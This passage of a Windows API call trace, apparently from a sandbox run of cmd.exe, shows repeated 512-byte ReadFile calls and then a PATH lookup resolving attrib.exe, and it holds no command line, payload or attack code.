hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.241] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.251] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.252] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.253] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.254] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.255] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.256] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.257] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.258] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.259] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.260] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.260] ReadFile (in: hFile=0x58, lpBuffer=0x24ed2c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24df1c, lpOverlapped=0x0 | out: lpBuffer=0x24ed2c*, lpNumberOfBytesRead=0x24df1c*=0x200, lpOverlapped=0x0) returned 1 [0128.287] _close (_FileHandle=4) returned 0 [0128.288] FindNextFileW (in: hFindFile=0x43e7e0, lpFindFileData=0x24ef90 | out: lpFindFileData=0x24ef90) returned 0 [0128.288] GetLastError () returned 0x12 [0128.288] FindClose (in: hFindFile=0x43e7e0 | out: hFindFile=0x43e7e0) returned 1 [0128.289] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0128.292] _close (_FileHandle=3) returned 0 [0128.292] GetConsoleTitleW (in: lpConsoleTitle=0x24f3c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0128.292] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0128.292] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0128.293] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0128.293] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.293] GetLastError () returned 0x2 [0128.293] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.293] GetLastError () returned 0x2 [0128.293] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0x43e7e0 [0128.293] FindClose (in: hFindFile=0x43e7e0 | out: hFindFile=0x43e7e0) returned 1 [0128.293] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0xffffffff [0128.294] GetLastError () returned 0x2 [0128.294] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x24ec64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ec64) returned 0x43e7e0 [0128.294] FindClose (in: hFindFile=0x43e7e0 | out: hFindFile=0x43e7e0) returned 1 [0128.294] _wcsicmp 